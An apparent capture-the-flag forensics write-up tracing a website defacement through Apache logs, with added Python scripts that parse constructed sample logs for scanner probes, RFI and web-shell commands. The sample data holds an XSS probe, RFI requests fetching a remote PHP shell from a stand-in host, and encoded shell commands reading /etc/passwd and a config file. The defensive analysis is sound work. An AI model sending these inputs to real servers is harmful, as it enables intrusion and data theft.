September 5, 2024
In this challenge, we’ve been tasked with analyzing Apache logs to uncover what an attacker did before defacing the victim’s website. We’re given access to an ELK instance to perform our investigation.
Mike is a young entrepreneur who recently started an online pharmaceutical company that supplies personal health products. As the business is growing at a rapid pace, Mike pressured the developers to create a website as quickly as possible and disregarded time-consuming security measures. Unsurprisingly, after the website went live it was defaced by a threat actor who also stole all the database records. Learning from this incident, Mike took down the server and began security testing and investigation. He set up a forwarder to send server logs to a SIEM and used a file integrity monitoring solution to get alerts when files are modified on the server. You are provided with the alerts generated from the file integrity monitoring tool, stored on the Desktop as FIM1.JPG and FIM2.JPG. You also have screenshots of the website homepage before and after the compromise, saved as Before.JPG and After.JPG.
As an analyst, you need to submit details to the CTI team. What is the signature left by the threat actor that compromised the website?
We've been provided with screenshots of the site before (Before.JPG) and after (After.JPG) it was defaced.
The defaced page carries the threat actor's signature, which is what the CTI team wants.
The attacker deleted some files. What are they? (Alphabetical order based on filename)
Aside from the screenshots of the website, we've also been given the alerts from the FIM (File Integrity Monitor), FIM1.JPG and FIM2.JPG.
Those alerts show the two files that were deleted; the question wants them listed alphabetically by filename.
What is the scanner used by the attacker to identify the vulnerability?
Our briefing instructed us to frame our hunt between Feb 17th and Feb 19th, 2021, so we'll start by restricting events in Kibana to that window.
We're looking for attacker activity, so we'll begin with POST requests: ordinary browsing is mostly GET, while form submissions and many injection attempts arrive as POSTs, so this cuts the noise quickly.
Sorting events from oldest to newest gives a clear sequence of what the attacker did.
After scrolling past a little noise we find what appears to be the attacker's first attempt at testing for vulnerabilities, an XSS probe, which also gives us a source IP to pivot on.
This doesn’t tell us what tool the attacker is using though, so we’ll drop our POST request filter and start looking at more data.
Unfortunately, our logs don't include User-Agents, which is normally the quickest way to name a scanner, so identifying the tool is a bit more complicated.
We can start by searching the request data for the names of well-known tools to see if we get lucky.
There don't seem to be any results for Nmap, but Nikto pops up 50 hits. With no User-Agent field, those matches have to come from the logged request lines themselves, which is enough to name the scanner.
Which PHP page is vulnerable to Remote File Inclusion (RFI)?
An RFI payload supplies a URL for the vulnerable include() to fetch, so we expect to find a full second URL inside the request line itself.
To filter for this we'll search for any requests that contain https (http and ftp are worth a pass too).
Unfortunately, this is a noisy filter: most of the hits aren't RFI attempts at all, because a URL in a Referer or in ordinary page content matches just as well.
We can narrow further to successful responses (response code 200), or simply scroll through the results until we reach the request whose query parameter carries the remote URL.
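As an added example (not part of the original write-up or the challenge material), the following Python script runs the same triage offline over a handful of constructed Apache lines in the challenge's format (Referer logged, User-Agent absent): it restricts events to the 17 to 19 Feb 2021 window, sorts them oldest first, counts request lines that mention a scanner by name, flags RFI by looking for a URL inside a decoded query-parameter value rather than anywhere in the line, and ranks source IPs by suspicious activity. The IPs, hostnames, probe paths and the shell filename in the sample are invented; only getimagesonly.php and mediafire.com come from the write-up.

```python
import re
from collections import Counter
from datetime import datetime
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines in the shape of the challenge's Apache logs: combined
# format with a Referer but no User-Agent. IPs, hostnames, probe paths and the
# shell filename are invented; getimagesonly.php and mediafire.com are from the write-up.
LOG_LINES = """\
10.0.0.5 - - [16/Feb/2021:08:00:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "https://www.example.com/"
203.0.113.77 - - [18/Feb/2021:10:15:02 +0000] "POST /search.php?q=<script>alert(1)</script> HTTP/1.1" 200 4102 "-"
203.0.113.77 - - [18/Feb/2021:10:16:10 +0000] "GET /cgi-bin/nikto-probe.cgi HTTP/1.1" 404 512 "-"
203.0.113.77 - - [18/Feb/2021:10:16:11 +0000] "GET /index.php?nikto=test HTTP/1.1" 200 5120 "-"
10.0.0.9 - - [18/Feb/2021:11:00:00 +0000] "GET /news.php?id=3 HTTP/1.1" 200 2048 "https://www.facebook.com/"
203.0.113.77 - - [18/Feb/2021:12:30:44 +0000] "GET /getimagesonly.php?image=https%3A%2F%2Fwww.mediafire.com%2Ffile%2Fabc123%2Fexample-shell.txt HTTP/1.1" 200 1337 "-"
203.0.113.77 - - [18/Feb/2021:12:30:45 +0000] "GET /getimagesonly.php?image=http://198.51.100.9/example-shell.txt HTTP/1.1" 200 1337 "-"
10.0.0.9 - - [20/Feb/2021:09:00:00 +0000] "POST /login.php HTTP/1.1" 302 0 "-"
"""

# Apache combined format minus the User-Agent; the Referer is optional.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?:\d+|-)'
    r'(?: "(?P<referer>[^"]*)")?'
)

# Hunt window from the briefing: 17 to 19 Feb 2021 inclusive.
START = datetime.fromisoformat("2021-02-17T00:00:00+00:00")
END = datetime.fromisoformat("2021-02-20T00:00:00+00:00")

SCANNERS = ("nikto", "nmap", "sqlmap", "wpscan")
URL_RE = re.compile(r'^(?:https?|ftp)://', re.I)


def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["time"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
    ev["status"] = int(ev["status"])
    return ev


def load_events(text):
    return [ev for ev in map(parse_line, text.splitlines()) if ev]


def in_window(events, start, end):
    """Keep events with start <= time < end, oldest first (how the write-up sorts them)."""
    return sorted((e for e in events if start <= e["time"] < end), key=lambda e: e["time"])


def scanner_hits(events, names=SCANNERS):
    """Count request lines naming each scanner; with no User-Agent this is all we have."""
    return {n: sum(n in e["uri"].lower() for e in events) for n in names}


def find_rfi(events):
    """Flag requests where a query-parameter *value* is itself a URL.
    The Referer is deliberately ignored: a URL there is browsing, not an include."""
    hits = []
    for e in events:
        parts = urlsplit(e["uri"])
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            value = unquote(value)  # parse_qsl decoded once; this catches double-encoding
            if URL_RE.match(value):
                hits.append({"ip": e["ip"], "time": e["time"], "status": e["status"],
                             "path": parts.path, "param": name, "remote_url": value})
    return hits


def attacker_candidates(events):
    """Rank source IPs by how many scanner probes and RFI attempts they produced."""
    score = Counter()
    for e in events:
        if any(n in e["uri"].lower() for n in SCANNERS):
            score[e["ip"]] += 1
    for h in find_rfi(events):
        score[h["ip"]] += 1
    return score


if __name__ == "__main__":
    window = in_window(load_events(LOG_LINES), START, END)
    print("scanner mentions:", scanner_hits(window))
    for h in find_rfi(window):
        print(h["time"], h["ip"], h["path"], h["param"], "->", h["remote_url"], h["status"])
    print("top suspect:", attacker_candidates(window).most_common(1))
```

Matching on decoded parameter values instead of the whole line is what removes the noise the write-up runs into: a Referer of https://www.facebook.com/ never becomes an RFI hit, while the URL-encoded mediafire.com link inside the getimagesonly.php parameter does. Narrowing to status 200, as the write-up suggests, is a one-line filter on the returned status field.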
What is the IP address of the remote attacker?(3 points)
We discovered this in Q3, in the POST request that looked like XSS testing.
What is the name of the PHP shell?
We'll adjust our filter now to the endpoint that is vulnerable to RFI (getimagesonly).
After adjusting our query it becomes clear that the attacker pulled a PHP shell from mediafire.com through that parameter; the remote URL in the request names the file.
The attacker downloaded the PHP shell from a file-hosting website. What is the name of the website?
We discovered this in the previous question.
What time was the first command executed through the PHP shell?(3 points)
Again we'll adjust our query, this time filtering for requests to the backdoor file itself.
Note: the answer expected is not the @timestamp of the log entry (when the SIEM ingested it) but the timestamp inside the message field, i.e. the Apache request time.
Which config file does the attacker attempt to read using the command ‘cat’?
Keeping the existing filters, we can read through the commands the attacker passed to the shell, in order.
Shortly after the first command from Q8, the attacker read the passwd file, ran pwd, and enumerated /opt/lampp/htdocs before reading a config file with cat.
At what time was the database dumped by the attacker?
The database doesn't seem to have been dumped through the backdoor, so we'll drop the backdoor filter.
We'll also move the start of our timeframe to just after the backdoor was uploaded, or thereabouts.
Scrolling through the results we can see the attacker accessed phpmyadmin, a favourite target once a web server is compromised.
Shortly after that we see a request to phpmyadmin/db_structure.php and, not long after, to db_export.php, the export (dump) page; the time of that request answers the question.
The attacker exfiltrated the database records. What is the database name? (Just the name, without any extension)
The name of the database appears in the query string of the db_export.php request from the previous question.
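Added example, again not from the original post: given request records already filtered to the attacker's traffic and carrying the timestamp from the Apache message field rather than the SIEM's @timestamp, this script extracts the commands passed to the backdoor in order, returns the first command's time (Q8), picks out cat reads of config-looking files (Q9), and pulls the database name from the phpMyAdmin db_export.php request (Q10 and Q11). The shell filename, the config file path and the database name are invented; the cmd parameter name and the db= parameter of db_export.php are assumptions about this particular shell and about phpMyAdmin's query string.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed records in the order the write-up reads them (oldest first). The
# timestamp is the one inside the Apache message, not the SIEM's ingest time.
# The shell name, the config file name and the database name are invented;
# /opt/lampp/htdocs and the phpMyAdmin pages come from the write-up.
RECORDS = [
    ("18/Feb/2021:12:40:01 +0000", "GET /example-shell.php HTTP/1.1"),
    ("18/Feb/2021:12:40:15 +0000", "GET /example-shell.php?cmd=whoami HTTP/1.1"),
    ("18/Feb/2021:12:41:02 +0000", "GET /example-shell.php?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1"),
    ("18/Feb/2021:12:41:30 +0000", "GET /example-shell.php?cmd=pwd HTTP/1.1"),
    ("18/Feb/2021:12:42:05 +0000", "GET /example-shell.php?cmd=ls+-la+%2Fopt%2Flampp%2Fhtdocs HTTP/1.1"),
    ("18/Feb/2021:12:43:11 +0000", "GET /example-shell.php?cmd=cat+%2Fopt%2Flampp%2Fhtdocs%2Fexample-config.php HTTP/1.1"),
    ("18/Feb/2021:12:50:00 +0000", "GET /phpmyadmin/index.php HTTP/1.1"),
    ("18/Feb/2021:12:51:20 +0000", "GET /phpmyadmin/db_structure.php?db=exampledb HTTP/1.1"),
    ("18/Feb/2021:12:52:44 +0000", "GET /phpmyadmin/db_export.php?db=exampledb HTTP/1.1"),
]

# Filenames that look like configuration: "config" anywhere, or a typical extension.
CONFIG_RE = re.compile(r'config|\.(?:conf|ini|env|yml|yaml)$', re.I)


def split_request(request_line):
    """'GET /a?b=c HTTP/1.1' -> (method, path, [(param, value), ...]), values URL-decoded."""
    method, uri, _ = request_line.split(" ", 2)
    parts = urlsplit(uri)
    return method, parts.path, parse_qsl(parts.query, keep_blank_values=True)


def shell_commands(records, shell_path, param="cmd"):
    """Every command sent to the backdoor, with its message-field timestamp.
    The parameter name is an assumption about this shell (many use cmd or c)."""
    out = []
    for ts, req in records:
        _, path, params = split_request(req)
        if path != shell_path:
            continue
        for name, value in params:
            if name == param and value:
                out.append((ts, value))
    return out


def first_command_time(commands):
    """Q8: the records are oldest-first, so the first command is the first entry."""
    return commands[0][0] if commands else None


def config_reads(commands):
    """Q9: `cat <file>` commands whose target looks like a configuration file."""
    hits = []
    for ts, cmd in commands:
        m = re.match(r'^cat\s+(\S+)', cmd)
        if m and CONFIG_RE.search(m.group(1)):
            hits.append((ts, m.group(1)))
    return hits


def db_exports(records):
    """Q10/Q11: phpMyAdmin export requests and the database they name.
    Assumes phpMyAdmin carries the database in a db= query parameter."""
    hits = []
    for ts, req in records:
        _, path, params = split_request(req)
        if path.lower().endswith("/db_export.php"):
            hits.append((ts, dict(params).get("db")))
    return hits


if __name__ == "__main__":
    cmds = shell_commands(RECORDS, "/example-shell.php")
    for ts, cmd in cmds:
        print(ts, cmd)
    print("first command:", first_command_time(cmds))
    print("config reads:", config_reads(cmds))
    print("database exports:", db_exports(RECORDS))
```

Decoding through parse_qsl is what turns `cat+%2Fetc%2Fpasswd` back into the command the attacker actually typed; grepping the raw log for "cat /" would miss it. The same decoded view is where the ls of /opt/lampp/htdocs and the later cat of the config file line up with the sequence described above.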